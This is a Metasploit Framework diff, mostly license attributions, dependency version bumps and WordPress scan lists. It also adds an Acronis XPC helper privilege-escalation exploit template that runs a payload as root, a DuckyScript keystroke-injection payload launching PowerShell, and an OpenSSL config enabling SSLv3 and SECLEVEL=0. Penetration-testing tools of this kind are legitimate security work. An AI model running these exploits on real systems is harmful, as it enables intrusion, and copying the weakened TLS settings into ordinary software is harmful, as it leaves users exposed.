+Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module
+
+Files: exteneral/source/exploits/CVE-2022-26904/*
+Copyright: 2022 Abdelhamid Naceri
+License: MIT
+
+Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
+Copyright: 2011 Jon Bringhurst
+License: GNU GPL 2.0
+
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3
+Purpose: This set of source code supports the following modules
+         exploits/windows/local/ms13_097_ie_registry_symlink.rb
+         exploits/windows/local/ms14_009_ie_dfsvc.rb
+
 Files: external/source/ipwn/*
 Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
           2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic
-
-Files: external/source/ReflectiveDLLInjection/*
-Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-License: BSD-3-clause
+Purpose: These files are used in payloads/stages/osx/armle/execute

 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause

-Files: external/source/tightvnc/*
-Copyright: 1999 AT&T Laboratories Cambridge.
-           2000 Tridia Corp.
-           2002-2003 RealVNC Ltd.
-           2001-2004 HorizonLive.com, Inc.
-           2000-2007 Constantin Kaplinsky
-           2000-2009 TightVNC Group
-License: GPL-2
+Files: external/source/osx/isight/*
+Copyright: 2009
+License: GPL
+Purpose: Used in modules/payloads/stages/osx/x86/isight to capture images.
+
+Files: external/source/pxesploit/regeditor/ntreg.h
+       external/source/pxesploit/regeditor/ntreg.c
+Copyright: 1997-2010, Petter Nordahl-Hagen
+License: LGPL
+Purpose: Unknown. These files are used to create a linux binary called regeditor
+         which allows a linux OS to edit a Windows registry. It is used in
+         pxesploit modules.
+
+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+License: BSD-3-clause
+
+Files: external/source/shellcode/windows/build.sh
+Copyright: 2009
+License: GPL / Perl Artistic
+Purpose: A perl script to build some of the x86 Windows payloads.

 Files: external/source/unixasm/*
 Copyright: 2004-2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
 License: BSD-4-clause

 Files: external/source/vncdll/winvnc/*
+       external/source/tightvnc/*
 Copyright: 1999 AT&T Laboratories Cambridge.
           2000 Tridia Corp.
           2002-2003 RealVNC Ltd.
@@ -70,8 +117,12 @@ Copyright: 1999 AT&T Laboratories Cambridge.
           2000-2006 Constantin Kaplinsky.
           2000-2009 TightVNC Group
 License: GPL-2
+Purpose: The built result is used in:
+           payloads/stages/windows/vncinject.rb
+           payloads/stages/windows/x64/vncinject.rb

-Files: lib/anemone.rb lib/anemone/*
+Files: lib/anemone.rb
+       lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

@@ -83,11 +134,19 @@ Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

-Files: lib/net/dns.rb lib/net/dns/*
+Files: lib/msf/core/web_services/public/*
+       lib/msf/core/web_services/views/api_docs.erb
+Copyright: Copyright 2018 SmartBear Software
+License: Apache 2.0
+
+Files: lib/net/dns.rb
+       lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
+Files: lib/postgres_msf.rb
+       lib/postgres/postgres-pr/message.rb
+       lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

@@ -95,11 +154,13 @@ Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby

-Files: lib/rbmysql.rb lib/rbmysql/*
+Files: lib/rbmysql.rb
+       lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/snmp.rb lib/snmp/*
+Files: lib/snmp.rb
+       lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

@@ -107,37 +168,81 @@ Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause

-Files: lib/zip.rb lib/zip/*
+Files: lib/zip.rb
+       lib/zip/*
 Copyright: 2002-2004, Thomas Sandergaard
 License: Ruby

+Files: modules/auxiliary/dos/cisco/cisco_7937g_dos.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
+         until it is manually power cycled.
+
+Files: modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
+         until it automatically power cycles.
+
+Files: modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an unauthenticated user to change the credentials
+         for SSH access on a Cisco 7937G device.
+
+Files: modules/auxiliary/gather/office365userenum.py
+Copyright: 2015  Oliver Morton
+License: GPL
+Purpose: Enumerates valid usernames from Office 365 using ActiveSync.
+
+Files: modules/exploits/linux/local/bpf_priv_esc.rb
+       data/exploits/CVE-2016-4557/hello
+Copyright: 2001-2007
+License: GPL
+Purpose: This module contains the source code for FUSE, which this module
+         uploads and compiles or uploads a precompiled binary (hello).
+
+Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
+Copyright: 2017
+License: GPLv2
+Purpose: The Ruby file contains the text of several modules from exploit-db 
+         which it compiles and uploads to the target to elevate privileges.
+
+Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
+Copyright: 2020
+License: GPL
+Purpose: This module targets a vulnerability in Metasploit Framework versions
+         prior to 5.0.86.
+
+Files: modules/exploits/windows/smb/ms04_007_killbill.rb
+Copyright: 2004, Solar Eclipse
+License: GPL
+Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000 
+         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
+         module.
+
 Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

-Files: data/webcam/api.js
-Copyright: Copyright 2013 Muaz Khan<@muazkh>.
-License: MIT
+Files: modules/payloads/singles/windows/x64/messagebox.rb
+Copyright: 2018, jaguinaga
+License: GPL
+Purpose: This module allows us to create an x64 Windows messagebox payload.

-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
+Files: modules/post/linux/dos/xen_420_dos.rb
+Copyright: 2016
+License: GPL
+Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a 
+         paravirtualized VM. It contains a short code section licensed through
+         GPL.

-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
-
-Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
-Copyright: 2011 Jon Bringhurst
-License: GNU GPL 2.0
-
-Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
-Copyright: 2020 Johnny Shaw
-License: MIT
-
-Files: exteneral/source/exploits/CVE-2022-26904/*
-Copywrite: 2022 Abdelhamid Naceri
-License: MIT
+Files: tools/exploit/metasm_shell.rb
+Copyright: 2007, Yoann GUILLOT
+License: LGPL
+Purpose: Allows users to invoke an interactive metasm shell to get opcodes from
+assembly instructions.

 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
@@ -10,26 +10,26 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.648.0, "Apache 2.0"
-aws-sdk-core, 3.162.0, "Apache 2.0"
-aws-sdk-ec2, 1.341.0, "Apache 2.0"
-aws-sdk-iam, 1.71.0, "Apache 2.0"
-aws-sdk-kms, 1.58.0, "Apache 2.0"
-aws-sdk-s3, 1.115.0, "Apache 2.0"
+aws-partitions, 1.689.0, "Apache 2.0"
+aws-sdk-core, 3.168.4, "Apache 2.0"
+aws-sdk-ec2, 1.356.0, "Apache 2.0"
+aws-sdk-iam, 1.73.0, "Apache 2.0"
+aws-sdk-kms, 1.61.0, "Apache 2.0"
+aws-sdk-s3, 1.117.2, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.13, ruby
+bindata, 2.4.14, ruby
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.0.5, MIT
+concurrent-ruby, 1.1.10, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-debug, 1.6.2, "ruby, Simplified BSD"
+debug, 1.7.1, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.9, "Apache 2.0"
 docile, 1.4.0, MIT
@@ -37,13 +37,13 @@ domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.11.0, MIT
+erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.23.0, MIT
-faraday, 2.6.0, MIT
-faraday-net_http, 3.0.1, MIT
+faker, 3.1.0, MIT
+faraday, 2.7.2, MIT
+faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
@@ -58,39 +58,39 @@ http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
-io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.4.2, "ruby, Simplified BSD"
-jmespath, 1.6.1, "Apache 2.0"
+io-console, 0.6.0, "ruby, Simplified BSD"
+irb, 1.6.2, "ruby, Simplified BSD"
+jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.2, ruby
+json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.19.0, MIT
-memory_profiler, 1.0.0, MIT
+loofah, 2.19.1, MIT
+memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.5, "New BSD"
-metasploit-credential, 5.0.9, "New BSD"
-metasploit-framework, 6.2.26, "New BSD"
+metasploit-credential, 6.0.1, "New BSD"
+metasploit-framework, 6.2.37, "New BSD"
 metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.99, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.5, "New BSD"
+metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 5.0.6, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
-mini_portile2, 2.8.0, MIT
-minitest, 5.16.3, MIT
+mini_portile2, 2.8.1, MIT
+minitest, 5.17.0, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.6.0, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ldap, 0.17.1, MIT
-net-protocol, 0.1.3, "ruby, Simplified BSD"
-net-smtp, 0.3.2, "ruby, Simplified BSD"
+net-protocol, 0.2.1, "ruby, Simplified BSD"
+net-smtp, 0.3.3, "ruby, Simplified BSD"
 net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.9, MIT
+nokogiri, 1.13.10, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -98,29 +98,29 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.1, MIT
+parser, 3.2.0.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.10.0, MIT
-pg, 1.4.4, "Simplified BSD"
-pry, 0.13.1, MIT
-pry-byebug, 3.9.0, MIT
-public_suffix, 5.0.0, MIT
-puma, 6.0.0, "New BSD"
-racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.4, MIT
-rack-protection, 3.0.2, MIT
+pdf-reader, 2.11.0, MIT
+pg, 1.4.5, "Simplified BSD"
+pry, 0.14.2, MIT
+pry-byebug, 3.10.1, MIT
+public_suffix, 5.0.1, MIT
+puma, 6.0.2, "New BSD"
+racc, 1.6.2, "ruby, Simplified BSD"
+rack, 2.2.5, MIT
+rack-protection, 3.0.5, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.3, MIT
+rails-html-sanitizer, 1.4.4, MIT
 railties, 6.1.7, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.23, unknown
+recog, 3.0.3, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.6.0, MIT
-reline, 0.3.1, ruby
+regexp_parser, 2.6.1, MIT
+reline, 0.3.2, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.28, "New BSD"
@@ -137,46 +137,46 @@ rex-rop_builder, 0.1.4, "New BSD"
 rex-socket, 0.1.43, "New BSD"
 rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.46, "New BSD"
+rex-text, 0.2.47, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.11.0, MIT
-rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.1, MIT
-rspec-mocks, 3.11.1, MIT
+rspec, 3.12.0, MIT
+rspec-core, 3.12.0, MIT
+rspec-expectations, 3.12.2, MIT
+rspec-mocks, 3.12.2, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.1, MIT
-rubocop, 1.37.0, MIT
-rubocop-ast, 1.22.0, MIT
+rspec-support, 3.12.0, MIT
+rubocop, 1.42.0, MIT
+rubocop-ast, 1.24.1, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.0, "New BSD"
+ruby_smb, 3.2.1, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 3.0.2, MIT
-sqlite3, 1.5.3, "New BSD"
+sinatra, 3.0.5, MIT
+sqlite3, 1.5.4, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
 tilt, 2.0.11, MIT
-timecop, 0.9.5, MIT
-timeout, 0.3.0, "ruby, Simplified BSD"
+timecop, 0.9.6, MIT
+timeout, 0.3.1, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.5, MIT
-tzinfo-data, 1.2022.5, MIT
+tzinfo-data, 1.2022.7, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.3.0, MIT
+unicode-display_width, 2.4.2, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
 webrick, 1.7.0, "ruby, Simplified BSD"
@@ -188,4 +188,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.6.1, MIT
+zeitwerk, 2.6.6, MIT
@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.
@@ -49,6 +49,10 @@ module Metasploit
      when "production"
        config.eager_load = true
      end
+
+      if ActiveRecord.respond_to?(:legacy_connection_handling=)
+        ActiveRecord.legacy_connection_handling = false
+      end
    end
  end
 end
@@ -2,6 +2,7 @@ openssl_conf = openssl_init

 [openssl_init]
 providers = provider_sect
+ssl_conf = ssl_sect

 [provider_sect]
 default = default_sect
@@ -12,3 +13,11 @@ activate = 1

 [legacy_sect]
 activate = 1
+
+[ssl_sect]
+system_default = system_default_sect
+
+[system_default_sect]
+MinProtocol = SSLv3
+CipherString = ALL:@SECLEVEL=0
+Options = UnsafeLegacyRenegotiation
@@ -28,8 +28,8 @@ queries:
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_ADCS_CAS
-    description: 'Enumerate ADCS certificate authorities.'
+  - action: ENUM_AD_CS_CAS
+    description: 'Enumerate AD Certificate Service certificate authorities.'
    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
    filter: '(objectClass=pKIEnrollmentService)'
    attributes:
@@ -42,8 +42,8 @@ queries:
      - caCertificate
    references:
      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
-  - action: ENUM_ADCS_CERT_TEMPLATES
-    description: 'Enumerate ADCS certificate templates.'
+  - action: ENUM_AD_CS_CERT_TEMPLATES
+    description: 'Enumerate AD Certificate Service certificate templates.'
    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
    filter: '(objectClass=pkicertificatetemplate)'
    attributes:
@@ -156,7 +156,7 @@ queries:
      - operatingSystemServicePack
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf 
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
  - action: ENUM_EXCHANGE_RECIPIENTS
    description: 'Dump info about all known Exchange recipients.'
    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
@@ -231,7 +231,7 @@ queries:
      - serverName
    references:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  - action: ENUM_LAPS_PASSWORDS
    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
    filter: '(ms-MCS-AdmPwd=*)'
@@ -349,4 +349,4 @@ queries:
    references:
      - https://malicious.link/post/2022/ldapsearch-reference/
      - https://burmat.gitbook.io/security/hacking/domain-exploitation
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties 
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
@@ -0,0 +1,46 @@
+#import <Foundation/Foundation.h>
+
+@protocol HelperToolProtocol
+- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
+- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
+- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
+@end
+
+
+int main(int argc, char *argv[])
+{
+    NSString *service_name;
+    NSString *payload = @"<%= @payload_path %>";
+    NSArray *arg_array = @[@"-c", payload];
+    NSFileManager *file_manager = [NSFileManager defaultManager];
+
+    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
+    NSString *service_name_2021 = @"com.acronis.helpertool";
+    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
+    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];
+
+    if ([file_manager fileExistsAtPath:helper_path_2020])
+    {
+        service_name = service_name_2020;
+    }
+    else
+    {
+        service_name = service_name_2021;
+    }
+
+    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
+    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
+    [connection setRemoteObjectInterface:interface];
+
+    [connection resume];
+
+    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
+    {
+        return;
+    }];
+
+    [obj executeProcess:@"<%= sys_shell %>" arguments:arg_array caller:<%= @pid %> withReply:^(int arg)
+    {
+        return;
+    }];
+}
@@ -71,6 +71,8 @@
                        <B N="V"><%= arg[:value].to_s %></B>
                        <% elsif arg[:value].is_a? String %>
                        <S N="V"><%= arg[:value].encode(xml: :text) %></S>
+                        <% elsif arg[:value].is_a? Nokogiri::XML::Element %>
+                        <%= arg[:value].to_s %>
                        <% end %>
                      </MS>
                    </Obj>
@@ -8,7 +8,7 @@
  </soap:Header>
  <soap:Body>
    <m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
-      <m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
+      <m:UnresolvedEntry><%= name %></m:UnresolvedEntry>
    </m:ResolveNames>
  </soap:Body>
 </soap:Envelope>
@@ -0,0 +1,14 @@
+REM Title: Metasploit Generated Payload
+REM Description: Opens a payload via powershell on the system
+REM Version: 1.0
+REM Open start menu
+REM We use cmd.exe since the powershell payload is likely too long for the run bar
+GUI r
+DELAY 750
+STRING cmd.exe
+DELAY 750
+ENTER
+DELAY 750
+STRING powershell.exe %{var_payload}
+DELAY 750
+ENTER
@@ -54,4 +54,6 @@ easy-wp-smtp
 duplicator_download
 custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
-elementor
+elementor
+bookingpress
+paid-memberships-pro
@@ -168,17 +168,21 @@ aanews
 aanglo
 aapna
 aarambha-blogger
+aarambha-real-estate
 aargee
 aari
 aaron
 aaron-modified-intent
 aartus
+aasta
+aasta-light
 aav1
 aazeen
 ab
 ab-folio
 abacus
 abacus-hotel
+abadir
 abalane
 abaris
 abaya
@@ -204,6 +208,8 @@ abingle
 abiolian-business
 abisteel
 abitno
+ablanka
+ablanna
 able
 abletone
 ablog
@@ -239,6 +245,7 @@ abythens
 ac-board
 ac-care
 ac-repair
+ac-repair-services
 academic
 academic-clear
 academic-education
@@ -289,6 +296,8 @@ accountant-child
 accountantlaw
 accountants-theme
 accounting
+accounting-techup
+accountra
 accssesspress-stdasore
 ace
 ace-blog
@@ -312,6 +321,7 @@ acommerce
 acool
 acosminblogger
 acoustics
+across
 act-child
 act-theme-lite
 actify
@@ -396,6 +406,9 @@ adney
 adonis
 adorable-blog
 adoration
+adore-blog
+adore-business
+adore-news
 adri
 adrian-lite
 adrielly-saponi
@@ -414,17 +427,20 @@ advance-blog
 advance-blogging
 advance-business
 advance-coaching
+advance-consultancy
 advance-ecommerce-store
 advance-ecommerce-store1
 advance-education
 advance-fitness-gym
 advance-it-company
+advance-marketing-agency
 advance-one-page
 advance-pet-care
 advance-portfolio
 advance-portfolio-0-1
 advance-simple-blue
 advance-startup
+advance-techup
 advance1-fitness-gym
 advantage
 advent
@@ -442,6 +458,8 @@ adventure-travel
 adventure-travelling
 adventurous
 advertica-lite
+advertising-techup
+advertisingly-blog
 advik-blog-lite
 adviso
 advisory
@@ -457,7 +475,9 @@ aemi
 aemi-child
 aemon
 aeonaccess
+aeonblock
 aeonblog
+aeonium
 aeonmag
 aera
 aereo
@@ -481,8 +501,10 @@ affiliate-booster
 affiliate-booster-sk
 affiliate-marketingly
 affiliate-newspaperly
+affiliate-review
 affiliateblogwriter
 affiliates-bloglet
+affiliatex
 affilicious-theme
 affilistrap
 affilivice
@@ -518,6 +540,9 @@ agency-x
 agency-zita
 agencyup
 agencyup-dark
+agencywp
+agencyx
+agencyx-blog
 agensy
 aggiornare
 agile-spirit
@@ -526,9 +551,12 @@ agility-wp
 agindo
 agiva
 aglee-lite
+agnar
 agncy
 agni
 agri-lite
+agriculture-farm
+agriculture-farming
 agroamerica
 agronomics-lite
 aguafuerte
@@ -556,6 +584,7 @@ airi-patricia
 airi1
 airiteste
 airiwachswachs
+airl
 airmail-par-avion
 airnews
 airship
@@ -576,11 +605,14 @@ akarsh-blog
 akash
 akasse
 akbar
+akblog
 akella
 akhada-fitness-gym
 aki-blog
 akihabara
 akira
+akisa
+akisa-lite
 akks
 akpager
 aktivitetisormland
@@ -595,12 +627,15 @@ alacrity-lite
 aladdin
 alagu
 alamein
+alanah-free
 alanding-lite
 alante
+alante-blog
 alante-blue
 alante-boxed
 alante-business
 alante-corporate
+alante-dark
 alante-eboxed
 alante-ebusiness
 alante-emagazine
@@ -616,13 +651,16 @@ alante-x
 alante2
 alantrarose
 alara
+alaska-blog
 alaska-free
 alaymack
 alba
 alba-lite
 alba-tumblog
+albacore
 albar
 albatross
+alberta
 albinomouse
 albizia
 alce
@@ -684,6 +722,7 @@ alizee
 alkalia
 alkane
 alkimia
+alkio
 alkivia-chameleon
 alku
 all-about-coffee
@@ -704,7 +743,10 @@ allegiant
 allegiant-2
 allegiant1
 allegiantly
+allegro
+allele
 alleria
+alley
 alley-home-services
 alley-themes
 allied-uri-httpflytunes-fmthemesaries
@@ -739,6 +781,7 @@ alodabaty-uri-httpswww-alodabaty-com
 alodabaty-uri-httpswww-alodabaty-comthemesalodabatymagazine-lite
 alodabaty-uri-httpswww-alodabaty-comthemesmhmagazine-lite
 aloja
+alok
 alones
 alovernat
 alowa
@@ -791,6 +834,7 @@ alurra
 alux
 alvaro-uri-httpsthemepalace-comdownloadstravel-ultimate
 alvn-pizza
+always
 always-twittingtwitter-themeat4us
 alyena
 alyssas-blog
@@ -829,6 +873,7 @@ ambiguity
 ambika
 ambirurmxd
 ambision
+ambitio
 ambition
 ambling-bellows
 ambrosia
@@ -865,6 +910,7 @@ amoresyamores
 amp
 amp-accelerated-mobile-pages
 amp-publisher
+ampark
 ampbase
 ampface
 ampface-base
@@ -900,16 +946,19 @@ anacronico-uri-httpanacroniconet63netblog
 anadbry
 anaglyph-lite
 anakin-mobile
+analog
 analogbd
 analogous
 analytica
 analytical-lite
+anamio
 anand
 ananya
 anarcho-notepad
 anassar
 anatomy-lite
 anatta
+anc-news
 anchor
 anchorage
 andar
@@ -933,6 +982,7 @@ andygray
 anecdote-lite
 aneeq
 anew
+anews
 anexa
 anfaust
 anfolder
@@ -951,6 +1001,9 @@ ani-world
 aniki
 anila
 anima
+animal-pet-care
+animal-pet-shop
+animal-wildlife
 animals
 animass
 animate-lite
@@ -1010,6 +1063,7 @@ anvil-theme
 anvys
 anya
 anymags
+anymags-blog
 anymags-news
 anyna
 anyonepage
@@ -1020,6 +1074,7 @@ anzelysajt
 anzu
 aocean
 aos-second-version
+apace
 apazit
 apbt
 apelle-uno
@@ -1050,9 +1105,11 @@ apostrophe
 apothecary
 app-landing-page
 app7
+apparel-store
 appcloud
 appdetail
 appeal
+appetizer
 appgate
 apple
 apple-mac-os-x-leopard
@@ -1066,6 +1123,7 @@ application
 applicator
 appmela
 appointable
+appointech
 appointee
 appointment
 appointment-blue
@@ -1079,6 +1137,7 @@ apppage
 apppresser-mobile
 appre
 apprise
+approach
 appsense
 appsetter
 apptheme-free
@@ -1090,6 +1149,7 @@ apricot
 apricot-blog
 apt-news
 apweb
+aqeeq-agency
 aqua
 aqua-black
 aqua-blue
@@ -1097,6 +1157,7 @@ aqua-portfolio
 aqua10
 aquaapp
 aquablock
+aquafy-starter
 aquaparallax
 aquarella-lite
 aquarius
@@ -1126,6 +1187,7 @@ arbitragex
 arbuda
 arbune
 arbutus
+arc-fse
 arcade-basic
 arcade-basic-loff
 arcade-by-frelocaters
